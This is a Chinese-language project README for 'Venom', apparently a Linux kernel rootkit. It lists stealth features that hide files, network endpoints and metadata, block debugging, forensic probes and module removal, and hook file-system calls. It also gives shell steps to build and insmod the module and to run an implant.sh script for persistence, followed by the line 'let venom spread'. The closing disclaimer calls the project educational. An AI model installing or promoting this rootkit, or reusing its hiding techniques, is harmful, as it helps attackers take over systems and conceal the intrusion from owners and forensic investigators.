Venom

## 功能 * **输出拦截** — 监视内核写入路径以保护或隐藏追踪/日志。 * **输入拦截** — 检查读取操作以防止 Venom 内部信息泄露。 * **目录过滤（64位）** — 从常规 `ls`/readdir 视图中隐藏文件/目录。 * **目录过滤（32位/compat）** — 上述功能同样适用于32位兼容性调用。 * **模块加载控制** — 监视/阻止模块插入以阻止竞争对手。 * **基于FD的模块加载** — 以相同方式监视现代（fd）模块加载。 * **模块卸载保护** — 阻止或记录尝试移除模块的行为。 * **信号控制** — 拦截信号以阻止强制终止或干扰。 * **设备/ioctl保护** — 阻止/检查取证工具的 ioctl 探测。 * **TCP /proc钩子** — 过滤 `/proc/net/tcp` 和 `/proc/net/tcp6` 以隐藏端点。 * **UDP /proc钩子** — 过滤 `/proc/net/udp` 和 `/proc/net/udp6`。 * **数据包接收拦截** — 过滤原始数据包捕获路径（AF_PACKET/TPACKET）。 * **挂载阻止** — 拒绝不需要的挂载/移动以保持隐藏。 * **文件系统保护钩子** — 钩住 `openat`/`renameat`/`unlinkat` 以保护关键文件。 * **套接字日志记录** — 记录新套接字（监视出站通道）。 * **阻止 `ptrace` 和 `prctl`** — 反调试 * **process_vm_readv / process_vm_writev 监视** — 观察进程间内存读写尝试 * **隐藏元数据** - 文件的元数据将不会显示以保护rootkit * **命令日志记录** - 记录任何不安全运行的命令、二进制文件或文件 ## 安装 ``` # 插入模块 git clone https://github.com/Trevohack/Venom cd Venom make insmod venom.ko # 安装高级持久化 git clone https://github.com/Trevohack/Venom cd Venom chmod +x implant.sh ./implant.sh ``` - 让 venom 传播 ## 📚 文档 `docs` 文件夹包含项目的设计和参考资料。快速链接： - [系统调用钩子（概述）](./docs/syscalls.md) — 监视哪些钩子及其原因（非操作性） - [图表](./docs) — 流程和结构图 - [检测](./docs/detection) — 防御信号、建议的审计检查和安全测试建议 浏览文档：[文档](./docs) ## 收尾说明 Venom 不是武器，它是**研究和教育项目**。 ✔️ **保持责任** 只在您完全控制的安全、合法环境中使用此内容 ✔️ **为善做贡献** 欢迎改进文档、防御检测笔记或历史参考的Pull请求。贡献必须遵循负责任研究的精神**不要武器化代码，不要操作漏洞。** ✔️ **尊重生态系统** 此仓库是关于知识共享的，而不是滥用。始终尊重道德黑客和当地法律的边界。如有疑问，**不要在生产系统上运行它**。 ## 参考资料与特别感谢 - [Diamorphine](https://github.com/m0nad/Diamorphine) - 古老的工具但最大的灵感 - [TheXcellerator](https://xcellerator.github.io/posts/linux_rootkits_01/) - 首次了解LKMs，敬意满满 - [MatheuZSecurity](https://github.com/MatheuZSecurity) - 灵感来源，大声致谢 - [Kvoid](https://github.com/carloslack/KoviD) - Goat

标签：DNS 反向解析, Google搜索, hook, HTTP工具, ioctl, Linux内核模块, LKM, Ring0, Rootkit, rootkit工具, Web报告查看器, x64架构, Zeek, 信号拦截, 内核渗透, 内核级攻击, 后门工具, 嗅探欺骗, 安全对抗, 安全渗透, 客户端加密, 文件隐藏, 权限维持, 模块加载控制, 网络可见性, 网络安全审计, 进程隐藏